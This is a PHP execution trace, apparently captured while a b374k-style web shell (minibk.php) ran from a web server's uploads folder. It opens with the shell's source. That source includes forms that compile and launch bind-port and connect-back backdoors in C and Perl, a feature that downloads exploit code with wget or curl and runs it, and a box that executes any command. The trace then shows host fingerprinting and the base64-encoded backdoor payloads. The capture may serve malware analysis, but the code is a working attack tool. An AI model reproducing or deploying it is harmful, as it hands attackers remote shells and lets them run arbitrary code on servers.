elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'netsploit\')){ if (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'C\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'Perl\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'C\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'Perl\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'expcompile\']) && !empty($_POST[\'wurl\']) && !empty($_POST[\'wcmd\'])) { $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv(\'REMOTE_ADDR\')) ? (getenv(\'REMOTE_ADDR\')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'shell\')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST[\'submitcmd\'])) { echo @exe($_POST[\'cmd\']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET[\'delete\']) && ($_GET[\'delete\'] != "")){ $file = $_GET[\'delete\']; @unlink($file); } elseif(isset($_GET[\'fdelete\']) && ($_GET[\'fdelete\'] != "")){ @rmdir(rtrim($_GET[\'fdelete\'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET[\'mkdir\']) && ($_GET[\'mkdir\'] != "")){ $path = $pwd.$_GET[\'mkdir\']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?> </div> </body> </html> ' /var/www/html/uploads/minibk.php 194 0
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $ver = '1.01'
3 9 0 0.003248 692696 getenv 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'SERVER_SOFTWARE'
3 9 1 0.003265 692776
3 9 R 'Apache/2.4.52 (Ubuntu)'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $software = 'Apache/2.4.52 (Ubuntu)'
3 10 0 0.003295 692744 ini_get 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'safe_mode'
3 10 1 0.003310 692776
3 10 R FALSE
3 11 0 0.003324 692744 ini_get 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'safe_mode'
3 11 1 0.003339 692776
3 11 R FALSE
3 12 0 0.003352 692744 strtolower 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 FALSE
3 12 1 0.003366 692776
3 12 R ''
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $safemode = FALSE
3 13 0 0.003391 692744 php_uname 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 0
3 13 1 0.003406 692856
3 13 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $system = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3 14 0 0.003442 692856 substr 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 0 3
3 14 1 0.003460 692984
3 14 R 'Lin'
3 15 0 0.003473 692888 strtolower 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'Lin'
3 15 1 0.003487 692952
3 15 R 'lin'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $win = FALSE
3 16 0 0.003513 692856 exe 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'whoami'
4 17 0 0.003527 692856 function_exists 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'system'
4 17 1 0.003541 692896
4 17 R TRUE
4 18 0 0.003554 692856 ob_start 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 0
4 18 1 0.003568 709368
4 18 R TRUE
4 19 0 0.003581 709368 system 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'whoami'
4 19 1 0.004900 709440
4 19 R 'www-data'
4 20 0 0.004927 709368 ob_get_contents 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 0
4 20 1 0.004942 709408
4 20 R 'www-data\n'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff = 'www-data\n'
4 21 0 0.004970 709408 ob_end_clean 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 0
4 21 1 0.004984 692896
4 21 R TRUE
3 16 1 0.004997 692896
3 16 R 'www-data\n'
3 22 0 0.005011 692896 rapih 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'www-data\n'
4 23 0 0.005026 692896 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 '<br />' '' 'www-data\n'
4 23 1 0.005050 692992
4 23 R 'www-data\n'
4 24 0 0.005064 692896 trim 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'www-data\n'
4 24 1 0.005078 692968
4 24 R 'www-data'
3 22 1 0.005092 692936
3 22 R 'www-data'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $user = 'www-data'
3 25 0 0.005117 692896 exe 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'id'
4 26 0 0.005131 692896 function_exists 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'system'
4 26 1 0.005145 692936
4 26 R TRUE
4 27 0 0.005157 692896 ob_start 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 0
4 27 1 0.005171 709408
4 27 R TRUE
4 28 0 0.005183 709408 system 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'id'
4 28 1 0.006399 709520
4 28 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
4 29 0 0.006426 709408 ob_get_contents 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 0
4 29 1 0.006441 709488
4 29 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 30 0 0.006472 709488 ob_end_clean 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 0
4 30 1 0.006486 692976
4 30 R TRUE
3 25 1 0.006500 692976
3 25 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
3 31 0 0.006516 692976 rapih 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 32 0 0.006532 692976 str_replace 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 3 '<br />' '' 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 32 1 0.006549 693072
4 32 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 33 0 0.006565 692976 trim 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 33 1 0.006580 693088
4 33 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 31 1 0.006595 693056
3 31 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $id = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $prompt = 'www-data $ '
3 34 0 0.006635 693016 getcwd 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 0
3 34 1 0.006650 693064
3 34 R '/var/www/html/uploads'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pwd = '/var/www/html/uploads/'
3 35 0 0.006677 693064 function_exists 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'posix_getpwuid'
3 35 1 0.006691 693104
3 35 R TRUE
3 36 0 0.006704 693064 function_exists 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'posix_getgrgid'
3 36 1 0.006718 693104
3 36 R TRUE
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $posix = TRUE
3 37 0 0.006743 693064 gethostbyname 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'localhost'
3 37 1 0.006783 693144
3 37 R '127.0.0.1'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $server_ip = '127.0.0.1'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $my_ip = '127.0.0.1'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $bindport = '13123'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $bindport_pass = 'b374k'
3 38 0 0.006845 693104 explode 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 2 '/' '/var/www/html/uploads/'
3 38 1 0.006861 693712
3 38 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pwds = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pwdurl = ''
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $i = 0
3 39 0 0.006919 693640 sizeof 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 39 1 0.006937 693672
3 39 R 6
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/"> / </a>'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $i++
3 40 0 0.007024 693720 sizeof 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 40 1 0.007043 693752
3 40 R 6
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/">var / </a>'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $i++
3 41 0 0.007150 693752 sizeof 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 41 1 0.007169 693784
3 41 R 6
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/">www / </a>'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $i++
3 42 0 0.007279 693792 sizeof 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 42 1 0.007297 693824
3 42 R 6
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= 'html/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/html/">html / </a>'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $i++
3 43 0 0.007423 693840 sizeof 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 43 1 0.007441 693872
3 43 R 6
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= 'html/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pathz .= 'uploads/'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/html/uploads/">uploads / </a>'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $i++
3 44 0 0.007588 693912 sizeof 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 44 1 0.007606 693944
3 44 R 6
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff = 'Apache/2.4.52 (Ubuntu)<br />'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br />'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= 'uid=33(www-data) gid=33(www-data) groups=33(www-data)<br />'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= 'server ip : 127.0.0.1 <span class="gaya">|</span> your ip : 127.0.0.1<br />'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= 'safemode <span class="gaya">OFF<span><br />'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $buff .= ' > <a href="?y=/"> / </a><a href="?y=/var/">var / </a><a href="?y=/var/www/">www / </a><a href="?y=/var/www/html/">html / </a><a href="?y=/var/www/html/uploads/">uploads / </a>'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $port_bind_bd_c = 'bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07'
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $port_bind_bd_pl = 'ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8='
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $back_connect = 'fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=='
2 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $back_connect_c = 'XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw'
3 45 0 0.007812 694424 showdir 1 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 2 '/var/www/html/uploads/' 'www-data $ '
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $fname = []
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $dname = []
4 46 0 0.007851 694424 function_exists 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'posix_getpwuid'
4 46 1 0.007865 694464
4 46 R TRUE
4 47 0 0.007878 694424 function_exists 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'posix_getgrgid'
4 47 1 0.007895 694464
4 47 R TRUE
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $posix = TRUE
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $user = '????:????'
4 48 0 0.007932 694424 opendir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
4 48 1 0.007955 694816
4 48 R resource(6) of type (stream)
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $dh = resource(6) of type (stream)
4 49 0 0.007984 694784 readdir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 49 1 0.008009 694856
4 49 R '..'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $file = '..'
4 50 0 0.008034 694816 is_dir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '..'
4 50 1 0.008051 694864
4 50 R TRUE
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $dname[] = '..'
4 51 0 0.008076 695200 readdir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 51 1 0.008090 695280
4 51 R 'minibk.php'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $file = 'minibk.php'
4 52 0 0.008116 695240 is_dir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'minibk.php'
4 52 1 0.008132 695288
4 52 R FALSE
4 53 0 0.008145 695248 is_file 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'minibk.php'
4 53 1 0.008160 695288
4 53 R TRUE
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $fname[] = 'minibk.php'
4 54 0 0.008184 695624 readdir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 54 1 0.008198 695696
4 54 R '.'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $file = '.'
4 55 0 0.008222 695656 is_dir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.'
4 55 1 0.008237 695688
4 55 R TRUE
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $dname[] = '.'
4 56 0 0.008261 695648 readdir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 56 1 0.008274 695728
4 56 R 'prepend.php'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $file = 'prepend.php'
4 57 0 0.008303 695688 is_dir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'prepend.php'
4 57 1 0.008323 695736
4 57 R FALSE
4 58 0 0.008339 695696 is_file 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'prepend.php'
4 58 1 0.008353 695736
4 58 R TRUE
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $fname[] = 'prepend.php'
4 59 0 0.008377 695696 readdir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 59 1 0.008391 695768
4 59 R 'data'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $file = 'data'
4 60 0 0.008415 695728 is_dir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 'data'
4 60 1 0.008430 695760
4 60 R TRUE
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $dname[] = 'data'
4 61 0 0.008454 695720 readdir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 61 1 0.008468 695800
4 61 R '.htaccess'
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $file = '.htaccess'
4 62 0 0.008493 695760 is_dir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.htaccess'
4 62 1 0.008509 695808
4 62 R FALSE
4 63 0 0.008522 695768 is_file 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 '.htaccess'
4 63 1 0.008536 695808
4 63 R TRUE
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $fname[] = '.htaccess'
4 64 0 0.008560 695768 readdir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 64 1 0.008574 695808
4 64 R FALSE
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $file = FALSE
4 65 0 0.008604 695768 closedir 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 65 1 0.008621 695584
4 65 R NULL
4 66 0 0.008635 695568 sort 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 [0 => 'minibk.php', 1 => 'prepend.php', 2 => '.htaccess']
4 66 1 0.008653 695600
4 66 R TRUE
4 67 0 0.008666 695592 sort 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 [0 => '..', 1 => '.', 2 => 'data']
4 67 1 0.008683 695624
4 67 R TRUE
4 68 0 0.008696 695592 explode 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 2 '/' '/var/www/html/uploads/'
4 68 1 0.008713 696200
4 68 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 A /var/www/html/uploads/minibk.php(194) : eval()'d code 2 $path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 69 0 0.008749 696128 sizeof 0 /var/www/html/uploads/minibk.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 69 1 0.008767 696160
